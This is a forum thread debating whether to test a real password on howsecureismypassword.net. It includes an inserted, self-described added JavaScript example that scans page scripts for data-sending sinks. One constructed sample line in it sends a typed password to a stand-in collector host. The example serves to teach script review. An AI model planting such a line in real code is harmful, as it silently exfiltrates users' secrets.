How Secure Is My Password - Interesting Website

Status
Not open for further replies.
zork said:
This is ridiculous, if you want to make sure your password is secure you don't need to ENTER IT on a random website posted on a forum. Just take the time to read about password security, don't break the first rule about online security: DO NOT enter your passwords on a website just because it asks you to!!

The site gives you 'cool' useless information, the calculations are based on current processing power and longer password cracking times do not necessarily mean better passwords.

Hey, how about this, if you want to know FOR SURE if your boobs look good just come to my place and show them to me! no good?

Check out the page source (whirligig U on firefox on mac), it runs this JS:

http://howsecureismypassword.net/hsimp.js

Copy and paste that into something that gets it onto one page (like word) and if you're familiar with reading code you'll see that there is no communication back to the server.

The security is in the utter simplicity of the website.
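The kind of source review PhilipDT describes, sketched as an added example (not part of the thread, and not the contents of hsimp.js): a line-by-line scan of a script for browser APIs that can send data off the page or load further code. The sink list and both sample scripts are constructed for illustration. An empty result only narrows what to read by hand, since obfuscated code or a later change to the served script will not be caught by a pattern scan.

```javascript
// Patterns for common ways a page script can transmit data or pull in more code.
// Assumption: this list is chosen for the example and is not exhaustive.
const SINKS = [
  { name: 'XMLHttpRequest', re: /\bXMLHttpRequest\b/ },
  { name: 'fetch', re: /\bfetch\s*\(/ },
  { name: 'sendBeacon', re: /\bsendBeacon\s*\(/ },
  { name: 'WebSocket/EventSource', re: /\bnew\s+(WebSocket|EventSource)\b/ },
  { name: 'resource URL assignment', re: /\.(src|href|action)\s*=/ },
  { name: 'navigation', re: /\blocation\s*(\.\s*(href|assign|replace)\b|=[^=])/ },
  { name: 'form submit', re: /\.submit\s*\(/ },
  { name: 'dynamic code', re: /\beval\s*\(|\bnew\s+Function\b|\bset(Timeout|Interval)\s*\(\s*['"`]/ },
  { name: 'DOM injection', re: /\bdocument\.write\s*\(|\.innerHTML\s*\+?=/ },
];

// Return one finding per (line, sink) match so each hit can be reviewed by hand.
function scanScript(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const { name, re } of SINKS) {
      if (re.test(text)) findings.push({ line: i + 1, sink: name, text: text.trim() });
    }
  });
  return findings;
}

// Constructed sample 1: a strength estimate computed entirely in the page.
const LOCAL_ONLY = [
  'function estimate(pw) {',
  '  var pool = /[a-z]/.test(pw) ? 26 : 0;',
  '  if (/[0-9]/.test(pw)) pool += 10;',
  '  return Math.pow(pool, pw.length) / 1e9;',
  '}',
].join('\n');

// Constructed sample 2: the same script plus one line that would leak the input.
const PHONES_HOME = LOCAL_ONLY + '\n' + [
  'function report(pw) {',
  "  new Image().src = 'https://collector.invalid/?p=' + encodeURIComponent(pw);",
  '}',
].join('\n');

console.log(scanScript(LOCAL_ONLY));   // no findings
console.log(scanScript(PHONES_HOME));  // one finding on line 7
```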
 
PhilipDT said:
Check out the page source (whirligig U on firefox on mac), it runs this JS:

http://howsecureismypassword.net/hsimp.js

Copy and paste that into something that gets it onto one page (like word) and if you're familiar with reading code you'll see that there is no communication back to the server.

The security is in the utter simplicity of the website.

Yes I know that I didn't say this website is stealing passwords, I'm saying that it could, but still, the do-not-give-away-your-passwords rule remains.

People don't check the source code of a website and even if they did, you have to know what you are doing or looking for.

Imagine the website Lee posted was in fact malicious, he posted it here and everyone went and entered their password, that's what I am advising against, being an internet slut.
 
Why remember multiple passwords when you can use 1Password (not free) or KeePassX (free) combined with Dropbox to keep a backup of your password file and get access to it from anywhere in the world?

If some site gets hacked (hackers discover a fatal security flaw in vBulletin® Version 3.7.3 used here, for example) and they eventually manage to crack the encryption of the passwords, they'll get a random string that will log them into 1 website.
 
Lee said:
Well, the thing is that I design websites so I would never post a site that would pose danger to the security of members of this site!

I simply wanted to share some information with users who might not be aware that passwords really need to be "strong" to avoid potential danger of hacking and save (hopefully) someone a headache down the road with that information.


Here is a link to an article on hacking and passwords (no - you don't have to put your password in - just read it).
LINK



I feel like I'm taking crazy pills here, people on this thread are actually supporting such a bad idea as just typing in passwords anywhere on the internet for the sake of learning?? Not too bright really!

I know about security, I get paid to make big servers secure and I'm not talking about keeping grandma's emails and pictures safe. What I am saying here is that no matter how cool the link is and how much you want to help people, you cannot advise end users to type in their passwords on a random webpage just so 'they learn' how their passwords need to be strong.

What you are doing here, falls under the definition of phishing, you are asking a group of users you are familiar with and possibly shared email addresses with and other information as well, to type in their passwords on a non secure web page, AND you are a web designer.

That is exactly how phishing works and how countless people around the world are fucked online.

Now I know (well, I don't know, really) you are not a phisher and you were just trying to do good, but what you are doing and advising here is completely the opposite of what you are trying to help prevent.
 
But there is no way to link the password to a specific account unless I am missing something.

Even if they figure out it's my IP address and capture the password I entered in - how would they a) know my user name for a specific site and b) know which account is for which password? I have a different login/password for every single account. So they would have to know that a) it's me b) figure out my user name and then c) figure out what password goes with that specific account.
 
citygirl said:
But there is no way to link the password to a specific account unless I am missing something.

Even if they figure out it's my IP address and capture the password I entered in - how would they a) know my user name for a specific site and b) know which account is for which password? I have a different login/password for every single account. So they would have to know that a) it's me b) figure out my user name and then c) figure out what password goes with that specific account.

It's so annoying when the guy who tells everyone they should give away their passwords to some website he posted doesn't have to explain anything at all and the guy trying to teach people that this procedure is just plain dumb (entering your passwords anywhere on command) has to actually explain everything.

But still, cookies on your browser cache will tell me everything about your internet life, where you log on to, when, what different email addresses you use for each, etc, and if I'm a website I have access to these simple .txt file formatted cookies that are stored.. in your browser's cache.

Also, yeah you have a password for each service, but MOST people use the same (weak) password for every single site/service they use, the same password for gmail, baexpats, paypal, anything. I've worked with these technologies for years and I've seen people I know even, stealing passwords like crazy, lots of them not just targeted at one. And even if you use different passwords for everything, it takes less than 10 minutes to just try and discard the possible passwords that YOU provided until you get it right.
 
zork said:
It's so annoying when the guy who tells everyone they should give away their passwords to some website he posted doesn't have to explain anything at all and the guy trying to teach people that this procedure is just plain dumb (entering your passwords anywhere on command) has to actually explain everything.

But still, cookies on your browser cache will tell me everything about your internet life, where you log on to, when, what different email addresses you use for each, etc, and if I'm a website I have access to these simple .txt file formatted cookies that are stored.. in your browser's cache.

Also, yeah you have a password for each service, but MOST people use the same (weak) password for every single site/service they use, the same password for gmail, baexpats, paypal, anything. I've worked with these technologies for years and I've seen people I know even, stealing passwords like crazy, lots of them not just targeted at one. And even if you use different passwords for everything, it takes less than 10 minutes to just try and discard the possible passwords that YOU provided until you get it right.

Good heavens. Do you know anything about code? The password is being stored NOWHERE. If you're so paranoid and want to use the website to see how secure your password is, all you have to do is load the browser in an incognito version of Chrome, disconnect your internet connection, and voila: The page will still work, and the transmission of the password would be impossible because there would be no internet connection.

Oh yeah, I almost forgot.. Before turning off your internet connection to use the website, make sure you firmly place a tinfoil hat on your head.
 
bradlyhale said:
Do you need me to define phishing, or do you want to continue scare mongering?

I see you are unable to explain why you said I can't read code and I think the website lee posted is logging passwords, can you show me where I said that please? Otherwise you are not funny, you are just a pr-ick, help me laugh with you.

You are also unable to find the similarities between phishing and what lee did here and also you seem to have a hard time considering the examples I wrote here, one of them being phishing. Again, you keep putting words in my mouth, if you can't back it up, what can I do? You are treating me as if I came here and said 'be careful lee posted a phishing site and the code is stealing everyone's passwords!!', now back it up or stfu.
 